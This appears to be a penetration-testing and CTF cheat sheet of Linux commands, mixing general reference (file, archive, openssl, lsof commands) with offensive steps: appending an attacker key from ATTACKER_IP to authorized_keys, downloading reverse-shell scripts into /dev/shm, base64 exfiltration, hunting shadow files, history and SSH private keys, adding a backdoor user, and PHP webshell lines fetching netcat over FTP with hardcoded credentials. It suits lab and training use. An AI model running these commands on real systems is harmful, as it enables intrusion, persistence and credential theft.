Linux
MISC / TIPS
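# Kill whatever process is bound to a given port (here 445/tcp).
# fuser -k sends SIGKILL unless you name another signal (e.g. -k -TERM).
sudo fuser -k 445/tcp
# $_ expands to the last argument of the previous command - handy for long
# paths. It only refers to the immediately preceding command.
cd $_
# For example: create a directory and step into it
mkdir my-folder && cd "$_"
# xclip copies its stdin to the X clipboard; useful for long tool output
# (enum4linux, privcheck...). It needs a DISPLAY, so it does nothing in a
# plain SSH session without X forwarding. Redirect the file instead of cat|.
xclip -sel clip < /etc/resolv.conf
# An alias makes this shorter (aliases only expand in interactive shells)
alias toclip="xclip -sel clip"
toclip < /etc/resolv.conf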
Linux File Permission
(r)ead = Read permission: the user may read the file's content (on a directory: list its entries).
(x)Execute = The user may run the file as a program (on a directory: enter/traverse it).
(w)Write = The user may modify the file/program (deleting it needs write permission on the directory; on a directory: create or remove entries).
(s)SUID = When executed, the program runs with the privileges of the file's owner (for example root) instead of the caller's - the classic privilege-escalation target.
(s)SGID = When executed, the program runs with the privileges of the file's group (on a directory: new files inherit the directory's group).
uname -a #Kernel name, release, version and architecture
hostname #Name of this host
ip addr #Interfaces and the addresses currently assigned to them
Check User info and Common Files
- Current user details
- Last logged on users
- List all users
- Password hashes stored in /etc/passwd (instead of /etc/shadow)?
- Try to read restricted files
- Read user History: .bash_history, .nano_history, .mysql_history , etc.
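whoami #Current username
grep -E 'sh$' /etc/passwd #Accounts with a real login shell (bash, sh, zsh, ...), not only bash; nologin/false accounts are left out
cat /etc/group #See which users belong to privileged groups (sudo, wheel, adm, docker, disk, ...)
cat /etc/shadow #Attempt to read restricted files (only readable if you already have elevated rights)
cat ~/.bash_history #Read common history files for sensitive data
locate password | more #Search for files whose name contains 'password' (locate's database can be stale; run updatedb if you can)
find / -name authorized_keys 2> /dev/null #Find ssh authorized_keys files (who can log in as whom)
find / \( -name id_rsa -o -name id_dsa -o -name id_ecdsa -o -name id_ed25519 \) 2> /dev/null #Find ssh private keys, not only RSA ones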
Find Backup Files
/home
/root
/tmp
/var
/var/backups
/opt
Common Bash
#Exfiltration using Base64 (one single line, easy to copy/paste)
base64 --wrap=0 file
#Hex dump as one continuous line (plain hex, no offsets or ASCII column)
xxd -ps boot12.bin | tr -d '\n'
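#Add your public key to the target's authorized_keys.
# The file name must be exactly "authorized_keys", and sshd (StrictModes) ignores
# it if ~/.ssh or the file is writable by group/others: 700/600 is the safe choice.
# -f makes curl fail on an HTTP error instead of appending an error page to the file.
mkdir -p ~/.ssh && chmod 700 ~/.ssh
curl -sf https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys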
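#Echo without trailing newline (-n) and with backslash escapes interpreted (-e), e.g. raw bytes
echo -n -e '\x41\x42'
#Count (write the file name without <>: the shell reads "<file>" as two redirections)
wc -l file #Lines
wc -c file #Bytes (use -m for characters)
#Sort
sort -nr file #Sort numerically, highest first
sort -u file #Sort and drop duplicates (same result as sort | uniq, one process less)
#Replace in file
sed -i 's/OLD/NEW/g' path/file #Replace string inside a file, in place and without backup (use -i.bak to keep one)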
#Download into /dev/shm (tmpfs, so the file normally stays in RAM and leaves nothing on disk).
# Note: /dev/shm is often mounted noexec - run the file through its interpreter instead of directly.
wget --output-document=/dev/shm/.rev.py 10.10.14.14:8000/tcp_pty_backconnect.py
wget --directory-prefix=/dev/shm 10.10.14.14:8000/tcp_pty_backconnect.py
curl --output /dev/shm/shell.py 10.10.14.14:8000/shell.py
#Files used by network processes
lsof #Every open file of every process
lsof -p 3 #Open files of PID 3
lsof -i #Files of processes with network connections
lsof -i 4 #IPv4 only
lsof -i 6 #IPv6 only
lsof -a -i 4 -p 1234 #IPv4 network files of PID 1234 (-a ANDs the selectors, otherwise they are ORed)
lsof +D /lib #Processes holding files below the given directory
lsof -i :80 #Who is using port 80
fuser -v -n tcp 80 #Same question answered by fuser
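#Decompress
tar -xvzf /path/to/yourfile.tgz
tar -xvjf /path/to/yourfile.tbz
bzip2 -d /path/to/yourfile.bz2 #Replaces the .bz2 with the plain file (add -k to keep the original)
tar jxf file.tar.bz2
gunzip /path/to/yourfile.gz #Replaces the .gz with the plain file (add -k to keep the original)
unzip file.zip
7z x file.7z #"x" extracts keeping paths; "-x" is the exclude option and extracts nothing
sudo apt-get install xz-utils; unxz file.xz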
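#Add new user. The hash MUST come from command substitution: inside single quotes the
# literal text "openssl passwd -1 <Password>" would be stored as the hash and the account
# could never log in. -1 is MD5-crypt (accepted everywhere); -6 is SHA-512 where supported.
# -m creates a home directory, -s gives a usable shell (the default is often /bin/sh or nologin).
useradd -m -s /bin/bash -p "$(openssl passwd -1 '<Password>')" hacker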
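#Clipboard: copy a file's content. Redirect the file itself - "< cat file.txt" would
# read from a file called "cat" and pass "file.txt" to xclip as an option.
xclip -sel c < file.txt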
#HTTP servers (serve the current directory; ports below 1024 need root)
python -m SimpleHTTPServer 80 #Python 2
python3 -m http.server #Python 3, listens on 8000 by default
ruby -rwebrick -e 'WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start'
php -S "$ip":80
#Curl
#POST a JSON body
curl -X POST -H 'Content-Type: application/json' -d '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Authenticate with a JWT bearer token
curl --request GET --header 'Authorization: Bearer <JWT>' http://host:3000/endpoint
#Send Email (the body is read from stdin, so you are prompted for it)
sendEmail -s 192.168.8.131 -f from@email.com -t to@email.com -u Subject -a file.pdf
#Copy a binary file skipping its first X (28) bytes: one block of 28 bytes is skipped
dd bs=28 skip=1 if=file.bin of=blob
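#Mount .vhd files (virtual hard drive)
sudo apt-get install libguestfs-tools
sudo mkdir -p /mnt/vhd #The mount point must exist before mounting
guestmount --add NAME.vhd --inspector --ro /mnt/vhd #--ro keeps the image untouched (forensics-friendly); --inspector locates the OS partition automatically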
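# ssh-keyscan: grab the host keys of an ssh service. Comparing the keys from two ports
# (or two IPs) tells you whether they belong to the same host or to different containers.
ssh-keyscan 10.10.10.101
ssh-keyscan -p 2222 10.10.10.101 #Same host, non-default port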
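# Openssl
# Get the certificate chain from a server. -servername sends SNI: without it a server hosting
# several names returns its default certificate, not the vhost's. </dev/null closes stdin so
# s_client exits instead of waiting for input; -showcerts prints the whole chain.
openssl s_client -connect 10.10.10.127:443 -servername <HOSTNAME> -showcerts </dev/null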
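openssl x509 -in ca.cert.pem -text -noout #Read a certificate (-noout suppresses the PEM blob after the text)
openssl genrsa -out newuser.key 2048 #Create a new RSA-2048 private key
openssl req -new -key newuser.key -out newuser.csr -subj '/O=Fortune/CN=newuser@fortune.htb' #CSR from the private key. Set the Organization Name and Common Name the target expects (drop -subj to be prompted instead)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes -subj '/CN=<HOSTNAME>' #Self-signed certificate with an unencrypted key (-nodes)
openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Sign the CSR with the (intermediate) CA
openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Bundle cert+key as PKCS#12 for browser import (Firefox); prompts for an export password
# If you only need a client certificate and you hold the CA certificate AND its private key,
# you can simply bundle those two: the CA's own identity is then presented as the client certificate.
openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12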
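# Decrypt a passphrase-protected PEM RSA key ("Proc-Type: 4,ENCRYPTED" header); prompts for the passphrase
openssl rsa -in key.ssh.enc -out key.ssh
# Keys in the newer "-----BEGIN OPENSSH PRIVATE KEY-----" format are not understood by openssl:
# use ssh-keygen -p -f key.ssh.enc -N '' to remove the passphrase instead
#Decrypt a file made with "openssl enc -aes256 -k KEY" (-aes256 means aes-256-cbc).
# The key is quoted: unquoted <KEY> is parsed by the shell as two redirections and the real
# command would silently run with "-in" as the key.
openssl enc -aes256 -k '<KEY>' -d -in backup.tgz.enc -out b.tgz
# "bad decrypt" usually means a key-derivation mismatch: files made by OpenSSL < 1.1.0 need
# -md md5, files made with -pbkdf2 need -pbkdf2 here as well.
# -k exposes the key in the process list and shell history; -pass stdin or -kfile FILE avoids that.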
#Count the instructions a program executes (needs hardware counters: works on bare metal, usually not inside a VM)
perf stat -x, -e instructions:u ls
#Find trick for HTB: readable regular files modified between 2018-12-12 and 2018-12-14
find / -type f -readable -newermt 2018-12-12 ! -newermt 2018-12-14 ! -path "/proc/*" ! -path "/sys/*" -ls 2>/dev/null
#Reconfigure timezone
sudo dpkg-reconfigure tzdata
#Which package ships a given binary (needs: apt-get install apt-file, then apt-file update)
apt-file search /usr/bin/file
#Protobuf decode https://www.ezequiel.tech/2020/08/leaking-google-cloud-projects.html
base64 -d <<<"CIKUmMesGw==" | protoc --decode_raw
#Immutable bit: the file cannot be modified, deleted or renamed, not even by root, until the bit is cleared
sudo chattr +i file.txt
sudo chattr -i file.txt #Clear the bit so the file can be deleted again
FILE TRANSFER
NFS
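# You can remotely mount NFS volumes
showmount -e xx.xx.xx.xx #List what the server exports before mounting
mkdir -p /tmp/a #The mount point must exist
mount -t nfs xx.xx.xx.xx:/ /tmp/a #If the mount hangs, add -o nolock (no rpc.statd running on the client)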
Linux FTP
#!/bin/sh
# Non-interactive FTP download: -n disables auto-login, so the credentials are
# sent by the here-document. Everything, including the password, goes over port 21 in cleartext.
ftp -n IP <<'END_SCRIPT'
quote USER acknak
quote PASS jLQRZy4gyLhmMqz2whTw
binary
GET file.py
bye
END_SCRIPT
exit 0
# Can also be done over php:
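<?php /* Same download driven through a PHP webshell: build the ftp(1) command file line by line, then run ftp -n against it. The "open" line must be quoted: in sh "echo open host 21>file" redirects file descriptor 21 and the open command never reaches the file. Credentials travel in cleartext over FTP. */ ?>
<?php echo shell_exec("echo 'open 192.168.42.102 21' > /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo 'user acknak jLQRZy4gyLhmMqz2whTw' >> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo binary >> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo 'get netcat /usr/local/databases/netcat' >> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo bye >> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("ftp -n < /usr/local/databases/ftp.txt");?>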
Commands
Files and navigations
ls - directory listing (list all files/folders in the current dir)
ls -l - long (formatted) listing
ls -la - long listing including hidden (dot) files
cd dir - change directory to dir (dir is the directory name)
cd .. - change to the parent directory (note the space)
cd ../dir - change to dir inside the parent directory
cd - change to your home directory
pwd - show the current directory
mkdir dir - create a directory dir
rm file - delete file
rm -f file - force remove file (no prompt, missing files are ignored)
rm -rf dir - remove directory dir and everything inside it
rm -rf / - launch some nuclear bombs, don't do that !!!!
cp file1 file2 - copy file1 to file2
mv file1 file2 - rename file1 to file2
mv file1 dir/file2 - move file1 into dir as file2
touch file - create file or update its timestamp
cat file - output contents of file
cat > file - write standard input into file (overwrites it)
cat >> file - append standard input to file
tail -f file - output contents of file as it grows
System info
date - show current date/time
uptime - show uptime
whoami - who you're logged in as
w - display who is online
cat /proc/cpuinfo - display cpu info
cat /proc/meminfo - memory info
free - show memory and swap usage
du - show directory space usage
du -sh - total size of the current directory in human-readable units (K/M/G)
df - show disk usage
uname -a - show kernel information
Compressing
tar cf file.tar files - tar files into file.tar
tar xf file.tar - untar into current directory
tar tf file.tar - show contents of archive
options :
c - create archive
t - table of contents
x - extract
z - use gzip compression
f - specify filename
j - bzip2 compression
w - ask for confirmation
k - do not overwrite
T - files from file
v - verbose
Networking
ping host - ping host
whois domain - get whois for domain
dig domain - get DNS records for domain
dig -x host - reverse lookup of host
wget file - download file
wget -c file - continue a stopped download
wget -r url - recursively download files from url
curl url - outputs the webpage from url
curl -o meh.html url - writes the page to meh.html
ssh user@host - connect to host as user
processes
ps - display currently active processes
ps aux - detailed output (all users' processes)
kill pid - kill process with process id pid (sends SIGTERM; kill -9 pid forces it)
killall proc - kill all processes named proc
Permissions
chmod octal file - change permissions of file
4 - read (r)
2 - write (w)
1 - execute (x)
order : owner/group/world
chmod 777 - rwx for everyone (world-writable: avoid it on anything that matters)
chmod 755 - rwx for owner, rx for group and world
Some Others
grep pattern files - search in files for pattern
grep -r pattern dir - search for pattern recursively in dir
locate file - find all instances of file
whereis app - show possible locations of app
man command - show manual page of command